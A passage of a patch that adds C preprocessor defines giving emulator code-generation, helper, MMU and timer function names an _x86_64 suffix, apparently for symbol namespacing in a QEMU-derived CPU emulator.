gen_helper_vfp_touid gen_helper_vfp_touid_x86_64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_x86_64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_x86_64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_x86_64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_x86_64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_x86_64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_x86_64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_x86_64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_x86_64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_x86_64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_x86_64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_x86_64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_x86_64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_x86_64 +#define gen_helper_wfe gen_helper_wfe_x86_64 +#define gen_helper_wfi gen_helper_wfi_x86_64 +#define gen_hvc gen_hvc_x86_64 +#define gen_intermediate_code_internal gen_intermediate_code_internal_x86_64 +#define 
gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_x86_64 +#define gen_iwmmxt_address gen_iwmmxt_address_x86_64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_x86_64 +#define gen_jmp gen_jmp_x86_64 +#define gen_load_and_replicate gen_load_and_replicate_x86_64 +#define gen_load_exclusive gen_load_exclusive_x86_64 +#define gen_logic_CC gen_logic_CC_x86_64 +#define gen_logicq_cc gen_logicq_cc_x86_64 +#define gen_lookup_tb gen_lookup_tb_x86_64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_x86_64 +#define gen_mov_F1_vreg gen_mov_F1_vreg_x86_64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_x86_64 +#define gen_muls_i64_i32 gen_muls_i64_i32_x86_64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_x86_64 +#define gen_mulxy gen_mulxy_x86_64 +#define gen_neon_add gen_neon_add_x86_64 +#define gen_neon_addl gen_neon_addl_x86_64 +#define gen_neon_addl_saturate gen_neon_addl_saturate_x86_64 +#define gen_neon_bsl gen_neon_bsl_x86_64 +#define gen_neon_dup_high16 gen_neon_dup_high16_x86_64 +#define gen_neon_dup_low16 gen_neon_dup_low16_x86_64 +#define gen_neon_dup_u8 gen_neon_dup_u8_x86_64 +#define gen_neon_mull gen_neon_mull_x86_64 +#define gen_neon_narrow gen_neon_narrow_x86_64 +#define gen_neon_narrow_op gen_neon_narrow_op_x86_64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_x86_64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_x86_64 +#define gen_neon_negl gen_neon_negl_x86_64 +#define gen_neon_rsb gen_neon_rsb_x86_64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_x86_64 +#define gen_neon_subl gen_neon_subl_x86_64 +#define gen_neon_trn_u16 gen_neon_trn_u16_x86_64 +#define gen_neon_trn_u8 gen_neon_trn_u8_x86_64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_x86_64 +#define gen_neon_unzip gen_neon_unzip_x86_64 +#define gen_neon_widen gen_neon_widen_x86_64 +#define gen_neon_zip gen_neon_zip_x86_64 +#define gen_new_label gen_new_label_x86_64 +#define gen_nop_hint gen_nop_hint_x86_64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_x86_64 +#define 
gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_x86_64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_x86_64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_x86_64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_x86_64 +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_x86_64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_x86_64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_x86_64 +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_x86_64 +#define 
gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_x86_64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_x86_64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_x86_64 +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_x86_64 +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_x86_64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_x86_64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_x86_64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_x86_64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_x86_64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_x86_64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_x86_64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_x86_64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_x86_64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_x86_64 +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_x86_64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_x86_64 +#define gen_op_iwmmxt_setpsr_nz 
gen_op_iwmmxt_setpsr_nz_x86_64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_x86_64 +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_x86_64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_x86_64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_x86_64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_x86_64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_x86_64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_x86_64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_x86_64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_x86_64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_x86_64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_x86_64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_x86_64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_x86_64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_x86_64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_x86_64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_x86_64 +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_x86_64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_x86_64 +#define gen_op_iwmmxt_xorq_M0_wRn 
gen_op_iwmmxt_xorq_M0_wRn_x86_64 +#define gen_rev16 gen_rev16_x86_64 +#define gen_revsh gen_revsh_x86_64 +#define gen_rfe gen_rfe_x86_64 +#define gen_sar gen_sar_x86_64 +#define gen_sbc_CC gen_sbc_CC_x86_64 +#define gen_sbfx gen_sbfx_x86_64 +#define gen_set_CF_bit31 gen_set_CF_bit31_x86_64 +#define gen_set_condexec gen_set_condexec_x86_64 +#define gen_set_cpsr gen_set_cpsr_x86_64 +#define gen_set_label gen_set_label_x86_64 +#define gen_set_pc_im gen_set_pc_im_x86_64 +#define gen_set_psr gen_set_psr_x86_64 +#define gen_set_psr_im gen_set_psr_im_x86_64 +#define gen_shl gen_shl_x86_64 +#define gen_shr gen_shr_x86_64 +#define gen_smc gen_smc_x86_64 +#define gen_smul_dual gen_smul_dual_x86_64 +#define gen_srs gen_srs_x86_64 +#define gen_ss_advance gen_ss_advance_x86_64 +#define gen_step_complete_exception gen_step_complete_exception_x86_64 +#define gen_store_exclusive gen_store_exclusive_x86_64 +#define gen_storeq_reg gen_storeq_reg_x86_64 +#define gen_sub_carry gen_sub_carry_x86_64 +#define gen_sub_CC gen_sub_CC_x86_64 +#define gen_subq_msw gen_subq_msw_x86_64 +#define gen_swap_half gen_swap_half_x86_64 +#define gen_thumb2_data_op gen_thumb2_data_op_x86_64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_x86_64 +#define gen_ubfx gen_ubfx_x86_64 +#define gen_vfp_abs gen_vfp_abs_x86_64 +#define gen_vfp_add gen_vfp_add_x86_64 +#define gen_vfp_cmp gen_vfp_cmp_x86_64 +#define gen_vfp_cmpe gen_vfp_cmpe_x86_64 +#define gen_vfp_div gen_vfp_div_x86_64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_x86_64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_x86_64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_x86_64 +#define gen_vfp_ld gen_vfp_ld_x86_64 +#define gen_vfp_mrs gen_vfp_mrs_x86_64 +#define gen_vfp_msr gen_vfp_msr_x86_64 +#define gen_vfp_mul gen_vfp_mul_x86_64 +#define gen_vfp_neg gen_vfp_neg_x86_64 +#define gen_vfp_shto gen_vfp_shto_x86_64 +#define gen_vfp_sito gen_vfp_sito_x86_64 +#define gen_vfp_slto gen_vfp_slto_x86_64 +#define gen_vfp_sqrt gen_vfp_sqrt_x86_64 +#define 
gen_vfp_st gen_vfp_st_x86_64 +#define gen_vfp_sub gen_vfp_sub_x86_64 +#define gen_vfp_tosh gen_vfp_tosh_x86_64 +#define gen_vfp_tosi gen_vfp_tosi_x86_64 +#define gen_vfp_tosiz gen_vfp_tosiz_x86_64 +#define gen_vfp_tosl gen_vfp_tosl_x86_64 +#define gen_vfp_touh gen_vfp_touh_x86_64 +#define gen_vfp_toui gen_vfp_toui_x86_64 +#define gen_vfp_touiz gen_vfp_touiz_x86_64 +#define gen_vfp_toul gen_vfp_toul_x86_64 +#define gen_vfp_uhto gen_vfp_uhto_x86_64 +#define gen_vfp_uito gen_vfp_uito_x86_64 +#define gen_vfp_ulto gen_vfp_ulto_x86_64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_x86_64 +#define get_clock get_clock_x86_64 +#define get_clock_realtime get_clock_realtime_x86_64 +#define get_constraint_priority get_constraint_priority_x86_64 +#define get_float_exception_flags get_float_exception_flags_x86_64 +#define get_float_rounding_mode get_float_rounding_mode_x86_64 +#define get_fpstatus_ptr get_fpstatus_ptr_x86_64 +#define get_level1_table_address get_level1_table_address_x86_64 +#define get_mem_index get_mem_index_x86_64 +#define get_next_param_value get_next_param_value_x86_64 +#define get_opt_name get_opt_name_x86_64 +#define get_opt_value get_opt_value_x86_64 +#define get_page_addr_code get_page_addr_code_x86_64 +#define get_param_value get_param_value_x86_64 +#define get_phys_addr get_phys_addr_x86_64 +#define get_phys_addr_lpae get_phys_addr_lpae_x86_64 +#define get_phys_addr_mpu get_phys_addr_mpu_x86_64 +#define get_phys_addr_v5 get_phys_addr_v5_x86_64 +#define get_phys_addr_v6 get_phys_addr_v6_x86_64 +#define get_system_memory get_system_memory_x86_64 +#define get_ticks_per_sec get_ticks_per_sec_x86_64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_x86_64 +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__x86_64 +#define gt_cntfrq_access gt_cntfrq_access_x86_64 +#define gt_cnt_read gt_cnt_read_x86_64 +#define gt_cnt_reset gt_cnt_reset_x86_64 +#define gt_counter_access gt_counter_access_x86_64 +#define gt_ctl_write gt_ctl_write_x86_64 
+#define gt_cval_write gt_cval_write_x86_64 +#define gt_get_countervalue gt_get_countervalue_x86_64 +#define gt_pct_access gt_pct_access_x86_64 +#define gt_ptimer_access gt_ptimer_access_x86_64 +#define gt_recalc_timer gt_recalc_timer_x86_64 +#define gt_timer_access gt_timer_access_x86_64 +#define gt_tval_read gt_tval_read_x86_64 +#define gt_tval_write gt_tval_write_x86_64 +#define gt_vct_access gt_vct_access_x86_64 +#define gt_vtimer_access gt_vtimer_access_x86_64 +#define guest_phys_blocks_free guest_phys_blocks_free_x86_64 +#define guest_phys_blocks_init guest_phys_blocks_init_x86_64 +#define handle_vcvt handle_vcvt_x86_64 +#define handle_vminmaxnm handle_vminmaxnm_x86_64 +#define handle_vrint handle_vrint_x86_64 +#define handle_vsel handle_vsel_x86_64 +#define has_help_option has_help_option_x86_64 +#define have_bmi1 have_bmi1_x86_64 +#define have_bmi2 have_bmi2_x86_64 +#define hcr_write hcr_write_x86_64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_x86_64 +#define helper_add_saturate helper_add_saturate_x86_64 +#define helper_add_setq helper_add_setq_x86_64 +#define helper_add_usaturate helper_add_usaturate_x86_64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_x86_64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_x86_64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_x86_64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_x86_64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_x86_64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_x86_64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_x86_64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_x86_64 +#define helper_be_stl_mmu helper_be_stl_mmu_x86_64 +#define helper_be_stq_mmu helper_be_stq_mmu_x86_64 +#define helper_be_stw_mmu helper_be_stw_mmu_x86_64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_x86_64 +#define helper_clz_arm helper_clz_arm_x86_64 +#define helper_cpsr_read helper_cpsr_read_x86_64 +#define helper_cpsr_write helper_cpsr_write_x86_64 +#define helper_crc32_arm helper_crc32_arm_x86_64 
+#define helper_crc32c helper_crc32c_x86_64 +#define helper_crypto_aese helper_crypto_aese_x86_64 +#define helper_crypto_aesmc helper_crypto_aesmc_x86_64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_x86_64 +#define helper_crypto_sha1h helper_crypto_sha1h_x86_64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_x86_64 +#define helper_crypto_sha256h helper_crypto_sha256h_x86_64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_x86_64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_x86_64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_x86_64 +#define helper_dc_zva helper_dc_zva_x86_64 +#define helper_double_saturate helper_double_saturate_x86_64 +#define helper_exception_internal helper_exception_internal_x86_64 +#define helper_exception_return helper_exception_return_x86_64 +#define helper_exception_with_syndrome helper_exception_with_syndrome_x86_64 +#define helper_get_cp_reg helper_get_cp_reg_x86_64 +#define helper_get_cp_reg64 helper_get_cp_reg64_x86_64 +#define helper_get_r13_banked helper_get_r13_banked_x86_64 +#define helper_get_user_reg helper_get_user_reg_x86_64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_x86_64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_x86_64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_x86_64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_x86_64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_x86_64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_x86_64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_x86_64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_x86_64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_x86_64 +#define helper_iwmmxt_addub helper_iwmmxt_addub_x86_64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_x86_64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_x86_64 +#define helper_iwmmxt_align helper_iwmmxt_align_x86_64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_x86_64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_x86_64 +#define helper_iwmmxt_avgw0 
helper_iwmmxt_avgw0_x86_64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_x86_64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_x86_64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_x86_64 +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_x86_64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_x86_64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_x86_64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_x86_64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_x86_64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_x86_64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_x86_64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_x86_64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_x86_64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_x86_64 +#define helper_iwmmxt_insr helper_iwmmxt_insr_x86_64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_x86_64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_x86_64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_x86_64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_x86_64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_x86_64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_x86_64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_x86_64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_x86_64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_x86_64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_x86_64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_x86_64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_x86_64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_x86_64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_x86_64 +#define helper_iwmmxt_minul helper_iwmmxt_minul_x86_64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_x86_64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_x86_64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_x86_64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_x86_64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_x86_64 +#define helper_iwmmxt_muladdsw 
helper_iwmmxt_muladdsw_x86_64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_x86_64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_x86_64 +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_x86_64 +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_x86_64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_x86_64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_x86_64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_x86_64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_x86_64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_x86_64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_x86_64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_x86_64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_x86_64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_x86_64 +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_x86_64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_x86_64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_x86_64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_x86_64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_x86_64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_x86_64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_x86_64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_x86_64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_x86_64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_x86_64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_x86_64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_x86_64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_x86_64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_x86_64 +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_x86_64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_x86_64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_x86_64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_x86_64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_x86_64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_x86_64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_x86_64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_x86_64 
+#define helper_iwmmxt_subuw helper_iwmmxt_subuw_x86_64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_x86_64 +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_x86_64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_x86_64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_x86_64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_x86_64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_x86_64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_x86_64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_x86_64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_x86_64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_x86_64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_x86_64 +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_x86_64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_x86_64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_x86_64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_x86_64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_x86_64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_x86_64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_x86_64 +#define helper_ldb_cmmu helper_ldb_cmmu_x86_64 +#define helper_ldb_mmu helper_ldb_mmu_x86_64 +#define helper_ldl_cmmu helper_ldl_cmmu_x86_64 +#define helper_ldl_mmu helper_ldl_mmu_x86_64 +#define helper_ldq_cmmu helper_ldq_cmmu_x86_64 +#define helper_ldq_mmu helper_ldq_mmu_x86_64 +#define helper_ldw_cmmu helper_ldw_cmmu_x86_64 +#define helper_ldw_mmu helper_ldw_mmu_x86_64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_x86_64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_x86_64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_x86_64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_x86_64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_x86_64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_x86_64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_x86_64 +#define helper_le_ldw_cmmu 
